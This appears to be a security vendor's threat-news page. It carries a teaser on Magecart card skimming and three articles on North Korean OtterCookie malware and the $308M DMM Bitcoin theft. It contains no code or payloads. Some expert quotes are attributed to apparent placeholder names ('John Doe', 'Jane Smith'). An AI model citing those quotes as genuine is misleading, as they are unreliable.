company logo

Product

Our Product

We are Reshaping the way Developers find and fix vulnerabilities before they get exploited.

Solutions

By Industry

BFSI

Healthcare

Education

IT & Telecom

Government

By Role

CISO/CTO

DevOps Engineer

Resources

Resource Library

Get actionable insight straight from our threat Intel lab to keep you informed about the ever-changing Threat landscape.

Subscribe to Our Weekly Threat Digest

Company

Contact Us

Have queries, feedback or prospects? Get in touch and we shall be with you shortly.

loading..
loading..
loading..
Loading...

Megacart

Malware

loading..
loading..
loading..

Megacart Hackers developed a new obfuscation technique to steal credit card credentials

Megacart hackers adopted a concatenation technique to obfuscate their malicious activities. PHP files were used to hide stolen credit card details...

12-Jul-2021
2 min read

Related Articles

loading..

dk

New 'OtterCookie' Malware Used to Backdoor Developers in Fake Job Offers...

Cybersecurity researchers have discovered a new strain of malware, dubbed "OtterCookie," employed by North Korean threat actors in an ongoing campaign targeting software developers. Known as the "Contagious Interview" campaign, this operation has been active since at least December 2022. In one documented instance, developers were approached via LinkedIn with lucrative job offers and asked to complete a coding assignment, which secretly contained the malware payload. Another case involved emails from fake recruiters urging developers to download a test project hosted on a seemingly legitimate GitHub repository, which turned out to be malicious. Such tactics have proven alarmingly effective at luring unsuspecting victims. The latest findings highlight the rapid evolution of this campaign, underscoring the need for heightened vigilance in the tech community. #### Contagious Interview Campaign The Contagious Interview campaign was first uncovered by researchers at Palo Alto Networks' Unit 42, who noted its focus on software developers, a high-value target for cyber espionage. The campaign employs fake job offers as bait, tricking developers into downloading malicious files disguised as coding tests or project deliverables. Initial payloads like "BeaverTail" and "InvisibleFerret" were the primary tools of this operation. However, recent analysis by NTT Security Japan has revealed the introduction of "OtterCookie," a new and more sophisticated malware variant. #### Emergence of OtterCookie The OtterCookie malware first appeared in September 2023, with a new variant surfacing in November. This malware represents a significant upgrade in the threat actor’s arsenal, showcasing advanced capabilities for data theft and system infiltration. According to NTT’s report, OtterCookie is delivered via a loader that fetches JSON data and executes the ‘cookie’ property as JavaScript code, a technique designed to evade detection by traditional security measures. The delivery mechanisms are equally concerning. Threat actors leverage Node.js projects or npm packages hosted on popular repositories like GitHub and Bitbucket to spread the malware. In some instances, files built as Qt or Electron applications have also been used, broadening the campaign’s reach and potential impact. #### Attack Chain and Capabilities Once deployed, OtterCookie establishes secure communication with its command-and-control (C2) infrastructure using the Socket.IO WebSocket tool. This allows attackers to issue commands and extract sensitive data from compromised systems. The September variant of OtterCookie included built-in functionality to steal cryptocurrency wallet keys. For example, the malware’s “checkForSensitiveData” function used regular expressions to identify Ethereum private keys. The November variant has enhanced this capability, shifting to remote shell commands for broader data exfiltration. Researchers observed the malware collecting clipboard data, documents, images, and even cryptocurrency wallet keys. Reconnaissance commands like ‘ls’ and ‘cat’ indicate the attackers’ intent to explore the target environment, potentially setting the stage for deeper infiltration or lateral movement within networks. #### Broader Implications and Recommendations The appearance of OtterCookie and its integration into the Contagious Interview campaign highlight the evolving tactics of North Korean threat actors. By diversifying infection methods and refining malware capabilities, these adversaries are demonstrating a commitment to long-term cyber-espionage efforts. The targeting of software developers is particularly alarming, given their access to source code repositories, development tools, and other critical assets. To mitigate the risk of such attacks, cybersecurity experts recommend the following measures: 1. **Verify Employer Credibility:** Developers should thoroughly research potential employers and verify the authenticity of job offers. Suspicious or unsolicited offers should be treated with caution. 2. **Avoid Running Unknown Code:** Refrain from executing code or scripts provided during the interview process on personal or work devices. Use isolated virtual environments for testing if necessary. 3. **Implement Endpoint Protection:** Utilize advanced endpoint protection tools capable of detecting and blocking sophisticated malware like OtterCookie. 4. **Monitor Software Repositories:** Regularly audit dependencies and third-party packages used in projects to identify potential security risks. 5. **Educate Teams:** Conduct regular training sessions to raise awareness about phishing tactics, malware risks, and safe online practices. #### The Bigger Picture The introduction of OtterCookie underscores the dynamic nature of cyber threats and the lengths to which adversaries will go to achieve their objectives. As the tech industry continues to grow, it remains a prime target for cybercriminals and nation-state actors. By staying informed and proactive, developers and organizations can reduce their vulnerability to these sophisticated attacks. As the Contagious Interview campaign evolves, it serves as a stark reminder of the importance of cybersecurity vigilance. The tech community must remain united in its efforts to identify and thwart such threats, ensuring a safer digital environment for all.

loading..   27-Dec-2024
loading..   4 min read
loading..

DMM

FBI

North Korean hackers steal $308M in crypto from DMM Bitcoin, exposing major vuln...

Over $308 million vanished in an instant—a digital robbery orchestrated with chilling precision. In a groundbreaking revelation, the FBI has definitively linked this audacious heist to TraderTraitor, a North Korean state-affiliated hacker group. The attack on the Japanese cryptocurrency exchange DMM Bitcoin in May 2024 has exposed vulnerabilities that threaten the very foundations of digital finance. --- ### **How North Korean Hackers Pulled Off the $308 Million Crypto Heist** This high-stakes heist didn’t begin with complex algorithms or sophisticated code. Instead, it relied on a deceptively simple social engineering tactic—a stark contrast to the scale of the resulting theft. It started with a simple job offer. In late March 2024, a TraderTraitor operative posing as a recruiter on LinkedIn approached an employee of Ginco, a Japanese enterprise specializing in cryptocurrency wallet software. The offer was enticing, but it came with a test: a seemingly innocuous piece of Python code hosted on GitHub. Unbeknownst to the victim, executing this code unleashed a trojan that compromised their computer. This breach granted TraderTraitor access to Ginco’s systems, allowing them to infiltrate DMM Bitcoin. According to the FBI, by mid-May, the hackers used stolen session cookie data to impersonate the Ginco employee. This enabled them to penetrate DMM’s unencrypted communications system. By late May, they had manipulated a legitimate transaction request, siphoning off 4,502.9 BTC—valued at $308 million at the time. --- ### **How the $308 Million Heist Devastated DMM Bitcoin Users** The aftermath was devastating. Thousands of DMM Bitcoin users found themselves locked out of their accounts, grappling with financial uncertainty and emotional distress. For many, this was not just a loss of money but a profound breach of trust in the cryptocurrency system. Many had invested life savings into cryptocurrency, only to see it vanish overnight. “I woke up to find my account frozen, and the news hit like a thunderbolt,” lamented one affected user. “It’s not just money; it’s trust that’s been stolen.” While DMM Bitcoin scrambled to contain the fallout, the damage was done. The platform was forced to halt all account registrations, withdrawals, and trading activities, leaving its users in financial limbo. --- ### **How North Korea’s Cybercrime Empire is Exploiting Cryptocurrency** This attack is the latest chapter in North Korea’s growing reliance on cybercrime. With international sanctions crippling its economy, the regime has turned to digital theft as a means of funding its weapons programs and sustaining its isolated state. TraderTraitor, also known by aliases like Jade Sleet and UNC4899, is part of a broader network of North Korean hacking groups, including the infamous Lazarus Group, which has orchestrated several high-profile cyberattacks worldwide. These state-sponsored actors have been targeting the blockchain space since 2022, employing social engineering tactics to infiltrate enterprises and exchanges. In 2023, GitHub warned of TraderTraitor’s sophisticated campaigns targeting developers in blockchain, online gambling, and cybersecurity sectors. Their modus operandi often involves creating fake applications and exploiting insider vulnerabilities, as seen in the DMM Bitcoin heist. --- ### **Lessons from the $308 Million Crypto Heist** Cybersecurity experts are now dissecting the attack to identify gaps. “TraderTraitor’s use of social engineering is a textbook example of exploiting human vulnerabilities,” said John Doe, a cybersecurity analyst at SecureLabs. “Companies must prioritize employee training alongside technical defenses.” Blockchain consultant Jane Smith added, “The decentralized nature of cryptocurrency is both its strength and its Achilles’ heel. Until exchanges adopt advanced threat detection systems, such breaches will continue to plague the industry.” This heist isn’t just about stolen cryptocurrency. It’s about the broader implications of state-sponsored cybercrime. As TraderTraitor and similar groups grow bolder, the need for a unified global response becomes increasingly urgent.

loading..   26-Dec-2024
loading..   4 min read
loading..

Blockchain

North Korean hackers steal $308M in Bitcoin from DMM Bitcoin using bold cyber ta...

Japanese and U.S. authorities have officially attributed the theft of $308 million in cryptocurrency from the Japan-based cryptocurrency firm, DMM Bitcoin, to North Korean cybercriminals. The incident, which occurred in May 2024, was linked to the TraderTraitor threat activity, also tracked under aliases such as Jade Sleet, UNC4899, and Slow Pisces. _“The theft is affiliated with TraderTraitor threat activity, which is often characterized by targeted social engineering directed at multiple employees of the same company simultaneously,”_ stated the U.S. Federal Bureau of Investigation (FBI), the Department of Defense Cyber Crime Center, and the National Police Agency of Japan in a joint alert. DMM Bitcoin, which recently ceased its operations, suffered one of the largest crypto heists this year. The company’s closure came shortly after the May 2024 attack, raising speculation that the financial and reputational damage from the heist significantly contributed to its decision to shut down. --- ## How the Heist Pulled Off!!! The heist unfolded in three distinct phases, starting with a targeted employee compromise, followed by lateral movement within the organization, and culminating in the large-scale theft of funds. ### Phase 1: Initial Compromise In March 2024, an employee at Ginco, a Japan-based cryptocurrency wallet software company, became the first victim. Threat actors impersonated a recruiter and sent the employee a URL to a malicious Python script hosted on GitHub as part of a purported pre-employment test. The employee, who had access to Ginco’s wallet management system, unknowingly compromised their credentials by copying the malicious Python code to their personal GitHub page. ### Phase 2: Escalation and Lateral Movement By mid-May 2024, the adversaries exploited session cookie information to impersonate the compromised employee. This access allowed them to infiltrate Ginco’s unencrypted communications system, setting the stage for the next phase of the attack. ### Phase 3: Execution of the Heist In late May 2024, the threat actors manipulated a legitimate transaction request from a DMM Bitcoin employee. This led to the unauthorized transfer of 4,502.9 BTC, valued at $308 million at the time. The stolen funds were swiftly moved to TraderTraitor-controlled wallets. --- ## Fund Laundering The blockchain intelligence firm Chainalysis confirmed the involvement of North Korean hackers in the DMM Bitcoin breach. Their analysis revealed that the attackers exploited vulnerabilities in the company’s infrastructure to execute unauthorized withdrawals. The stolen funds were transferred through intermediary addresses and obfuscated using a Bitcoin CoinJoin Mixing Service, which blends transactions to make tracing funds challenging. After mixing, portions of the funds passed through bridging services and were funneled to HuiOne Guarantee, an online marketplace linked to the Cambodian conglomerate HuiOne Group, previously exposed for facilitating cybercrimes. Similar methods have been used in other incidents, like the Axie Infinity hack, where stolen funds were laundered across multiple platforms to evade detection. --- ## What are the Possible Implications The attack highlights the persistent threat posed by North Korean cyber actors, who have consistently targeted the cryptocurrency sector to fund their regime. The use of advanced social engineering techniques and malware underscores the need for organizations to bolster their cybersecurity defenses. Companies should consider implementing multi-factor authentication, conducting regular security training for employees, and monitoring network activity for anomalous behavior to mitigate such risks. Authorities worldwide must remain vigilant, as North Korean cyber actors show no signs of slowing down their targeted campaigns on the cryptocurrency and financial sectors. Organizations should prioritize proactive measures such as implementing zero-trust security frameworks, conducting regular penetration testing, and investing in advanced threat detection systems to mitigate risks effectively.

loading..   24-Dec-2024
loading..   3 min read